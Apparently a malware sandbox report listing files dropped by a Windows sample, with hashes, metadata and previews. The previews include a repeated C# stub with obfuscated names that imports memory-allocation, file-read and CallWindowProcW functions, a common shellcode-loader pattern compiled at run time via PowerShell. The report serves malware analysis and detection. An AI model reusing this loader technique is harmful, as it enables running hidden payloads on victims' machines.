Preview:	........2....kt2b.....~..9.;.Q..2...Z.._1..4.H.......9.u.W...........H.y I.Y.`...Ph.".\L..#..1.. m3.yuc.O@B.;B.Q......F..%...}&54<p.(....S1....I./O..:...`..=..vx.).w....t....r......j...y I.Y.`...Ph.".\L..#..1.. m3.yuc.O@B.;B.Q......F..%...}&54<p.(....S1....I./O..:...`..=..vx.).w....t....r......j.....H...^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^.......k..#k....Ls.$......Z..ir[M.....?......Y..rCM......g..~.....s.)..v...e..n.k.@z.p.4k....H...p...H........k...zD.H....,"op.c~.a.k...~..2.@U..=.v,..r.H.8..k...!.W..To\|1.\.[r.lL.dK.2.H...i....w.H.xc.....s...nbH.zkh.....:..j.. ..>..o\|1..+A.......wn...oL1O......g.H....X.TT.....k...bH.z.`,0k.....$.rz..bH.zk.....F.HMv7....H.z)..N.I..I.F&H.......Q.

C:\Users\user\AppData\Local\Temp\RES34E6.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	3.997687749422604
Encrypted:	false
SSDEEP:	24:H+K9oT6tXpzfHlwKvvfeI+ycuZhNHqakSmbPNnqSed:8TUXVmKXm1ulHqa3mRqS+
MD5:	19F939220E8C0D444710688009BD2B84
SHA1:	FF1CBC009250670A8C59987E81BE8085FADF1A1F
SHA-256:	31F454387F2E7A0C4E7CDB7E71E3A5A9692E4AD98B85F1C659A85712A64FFB19
SHA-512:	D93BA791E9F73C7B96AAC88E8BD1DAC356D28000A972B171747B2B0BE25412D7A31BF756DB93411E441F7D40F78C468956F54F9B0135FE5F7E465E8729BD9377
Malicious:	false
Preview:	L....s.a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........I....c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP..................WfIB..A..9p^.x............5.......C:\Users\user\AppData\Local\Temp\RES34E6.tmp.-.<....................a..Microsoft (R) CVTRES.p.=..cwd.C:\windows\SysWOW64\WindowsPowerShell\v1.0.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.o.t.c.k.r.0.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\RES728B.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	4.039517593581453
Encrypted:	false
SSDEEP:	24:HOK9oZLGMVTeKxfHOwKvvfeI+ycuZhN7BakS6mPNnqSed:sZLGUC0NKXm1ulFa3ZqS+
MD5:	8A2F0480250DC7E02EFE84718539C016
SHA1:	0463680A5FE7017561257513B7BB43EE8B20DECF
SHA-256:	A9DDF0A8FB1858D58345FF7554CFD0F0BB1E5CB264A1A952C657D9B44A8D8660
SHA-512:	E1D40BA6442918C3505F7D5C7D2CE3B29A99CB1A42DDE707E334D0108465D1EA7B8F3FCEEB264BF1FB715DCD0EA023B0FCF13E26D1C5E017572CF00C4361417E
Malicious:	false
Preview:	L.../s.a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP................&.%.....2.O.7.............5.......C:\Users\user\AppData\Local\Temp\RES728B.tmp.-.<....................a..Microsoft (R) CVTRES.p.=..cwd.C:\windows\SysWOW64\WindowsPowerShell\v1.0.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.y.b.s.2.g.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\RESD18D.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	3.9622757001598075
Encrypted:	false
SSDEEP:	24:HZzg691XGFZtHOwKTFpmfwI+ycuZhNQakSsPNnqSud:tzXGFZtNKTzmo1ulQa38qSu
MD5:	1359F94783A54D08D8FF485A0B920E85
SHA1:	EC42084022240CA9FD6B93699AB6285B56E0C0AD
SHA-256:	34DF8CDE736454A68C5289F172A2145051D0496ED2E3129FC8C3B533202B61D4
SHA-512:	E4EFA34D65D59E3230764012AD3C0594C1466567545EFDC6D208B81235197945964694D3FC598789C9B085648834F41AAA5A579229E4B08A581A27474B8103F0
Malicious:	false
Preview:	L....r.a.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........L....c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP.................=....`...bqe.<..........5.......C:\Users\user\AppData\Local\Temp\RESD18D.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.l.a.4.k.v.b.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ziegzhu.r2z.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xwfdi1y.d45.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0z3ml3q.bjh.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii1ag2th.hcn.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2nymaw1.wkd.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmlvvt2e.lbt.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwqfouut.cdz.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwszr1gg.pp5.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3yige21.53a.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbzy0giw.xe5.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\mla4kvb3.0.cs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	725
Entropy (8bit):	5.247788193967032
Encrypted:	false
SSDEEP:	12:V/DGrUoWvLIhqivuBdiVtKMCArOP+VI9yKTx+RPtyuwQiP2k9oJIzj:JoU5vLIoMuBduECN6LgFP+D
MD5:	C659BB6BE2FF2787E6E6B54020DF3923
SHA1:	52E0AD44AECE711701787842C58923DC2440A897
SHA-256:	8E481A83663E722657B2E2A38C00D887FCCDEE5DDA5B2A93BC127F087C805010
SHA-512:	49F43389059EFC61272F2EC95654454E04781C86F337D1C2B29B8E9666ADCA6C011D8B4C373FAAB16EB12665813CEA0E86AA6D2D3B67CEF3E76845F2D631637D
Malicious:	false
Preview:	.using System;..using System.Runtime.InteropServices;..public static class Opisthoc31..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);..[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);..}

C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.2519804524771825
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fOi10zxs7+AEszICN23fOidx:p37Lvkmb6Km510WZE75P
MD5:	3A2EE53753BB2E779C510AC04F8C4F8D
SHA1:	F359D5A7D065708E02D1E697B26138687CD48809
SHA-256:	0380D3287B80FF4A26C4EE700E3F16472EFCA76F27865CF5BAB9D382FC5E25C1
SHA-512:	BA2F7E32EC6EDF7AE14CEEF18771166E1935BA9188268AAE839A31164F6835C4F4CA0C685729CE0C740B78FF72666D5FE61C94636A2DBD75026914ED01C128AD
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mla4kvb3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mla4kvb3.0.cs"

C:\Users\user\AppData\Local\Temp\mla4kvb3.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.195584992610436
Encrypted:	false
SSDEEP:	48:6lPvc0gLTeVlojCkFy79Jg2D1ulQa38q:MvcPeVz9JmeK
MD5:	0C1E20214334E9D3CED0ABDD074C7DB5
SHA1:	8939BEFF6C7725EB62754B9B4E5489C6B7C7F770
SHA-256:	59FF3F8F5384A62B12CDFDF1DDE29F4E18B3E43867D72439CDE7CC51EAC9653E
SHA-512:	5531D454C60B4F1100723413084C0B3D7F6E7F5BFAE5C5B332FBE4442520F2E94315505F417C3AFF59E5B629C131568C857D0E7E408983B723DD53EB856A2C45
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r.a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................2.+...{.[.....[.......................................... 9............ Q............ ].!.......... f.+.......v...........................................................................................................$.

C:\Users\user\AppData\Local\Temp\mla4kvb3.out Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	852
Entropy (8bit):	5.303864639689193
Encrypted:	false
SSDEEP:	24:KSqd3ka6Km5LE752Kax5DqBVKVrdFAMBJTH:dika6P5LE752K2DcVKdBJj
MD5:	8685AD61A88330CA1B9793B3E19BF14F
SHA1:	122347D2429AF18424571ACB0042F8AD4452D502
SHA-256:	7A7C4B0E8CE7343A155C58CB2A970895BDEEE261EBAA96742A66098F383F5605
SHA-512:	CB9E5BF2E319DE448CDCD7F13B2979913DB68F1F189E445BFA8E9535EF1BF5EE44A87CC769243EF6866558286DF18F3CAB9F1875F9E707F87C5CBF7D1E7F4E20
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mla4kvb3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mla4kvb3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\uotckr0j.0.cs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	725
Entropy (8bit):	5.247788193967032
Encrypted:	false
SSDEEP:	12:V/DGrUoWvLIhqivuBdiVtKMCArOP+VI9yKTx+RPtyuwQiP2k9oJIzj:JoU5vLIoMuBduECN6LgFP+D
MD5:	C659BB6BE2FF2787E6E6B54020DF3923
SHA1:	52E0AD44AECE711701787842C58923DC2440A897
SHA-256:	8E481A83663E722657B2E2A38C00D887FCCDEE5DDA5B2A93BC127F087C805010
SHA-512:	49F43389059EFC61272F2EC95654454E04781C86F337D1C2B29B8E9666ADCA6C011D8B4C373FAAB16EB12665813CEA0E86AA6D2D3B67CEF3E76845F2D631637D
Malicious:	false
Preview:	.using System;..using System.Runtime.InteropServices;..public static class Opisthoc31..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);..[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);..}

C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.2451823234385815
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23f7dGzxs7+AEszICN23f7dV9:p37Lvkmb6KmRGWZE7Rb
MD5:	D202492A8D55F6064EBA82FC0EA765B1
SHA1:	6FB32C99A5F3902082142D6EFB5DCF059DDED633
SHA-256:	5F853B8F5834E884B3AEDF10EB6A0B6BE5BCB61D922CBE7BBBFE643798BF35AC
SHA-512:	980CE5AFA96E39DFC801AE70772ED2FC334E2F271AA65B28815CA8B6E53F9DB9A5343EB1663FED47405ACB24942BAECFEB3A3077914E435E6840D1DEDECA20D6
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uotckr0j.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uotckr0j.0.cs"

C:\Users\user\AppData\Local\Temp\uotckr0j.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.1901992072925816
Encrypted:	false
SSDEEP:	24:etGSwtoDTc8cF7ertlCLxV0uv0lojsxptkFU9JEloWI+ycuZhNHqakSmbPNnq:6VPvc0gLolojCkFU9JElD1ulHqa3mRq
MD5:	27B08E154E713C8A84ADEEC4FB8095BB
SHA1:	3E94A13302443C1F343EB55D2F8FC1293319A87D
SHA-256:	BED67E04B0BCDBB994B01389C6E6A4A3279C342EC9B8E2B9447DC400E865472B
SHA-512:	6500EB68A790BE76A84D5EBB29DFB3C781CC706610EF85F13FD167563F256D8D99A2FE806E72A63B0AE329E82EA27BB21EA056523ACFAB43EDC9661D73A4FFAB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................2.+...{.[.....[.......................................... 9............ Q............ ].!.......... f.+.......v...........................................................................................................$.

C:\Users\user\AppData\Local\Temp\uotckr0j.out Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	871
Entropy (8bit):	5.335126647714771
Encrypted:	false
SSDEEP:	24:7rqd3ka6KmVE7UKax5DqBVKVrdFAMBJTH:/ika6PVE7UK2DcVKdBJj
MD5:	3D5E6CFA534E5F8DD3D660AAF885617E
SHA1:	AAD6349AF3810BB0AE8DC24BAC64CB5A53108008
SHA-256:	4E22FAE7D1A966B7DBDA6B35098BB5A6F9D7DA7DA9319DC1C87A4A3BFA6AA33D
SHA-512:	CC613BF24154F4726124DE473EE8A9B39A9A0A0E5D09F73C6912E7126286CB78A1FF016DA24A16ABD736DA1C50E7A9A1404304ED149DF89A7E6C8CF2ECDB0D74
Malicious:	false
Preview:	.C:\windows\SysWOW64\WindowsPowerShell\v1.0> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uotckr0j.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uotckr0j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\vybs2gqu.0.cs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	725
Entropy (8bit):	5.247788193967032
Encrypted:	false
SSDEEP:	12:V/DGrUoWvLIhqivuBdiVtKMCArOP+VI9yKTx+RPtyuwQiP2k9oJIzj:JoU5vLIoMuBduECN6LgFP+D
MD5:	C659BB6BE2FF2787E6E6B54020DF3923
SHA1:	52E0AD44AECE711701787842C58923DC2440A897
SHA-256:	8E481A83663E722657B2E2A38C00D887FCCDEE5DDA5B2A93BC127F087C805010
SHA-512:	49F43389059EFC61272F2EC95654454E04781C86F337D1C2B29B8E9666ADCA6C011D8B4C373FAAB16EB12665813CEA0E86AA6D2D3B67CEF3E76845F2D631637D
Malicious:	false
Preview:	.using System;..using System.Runtime.InteropServices;..public static class Opisthoc31..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);..[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);..}

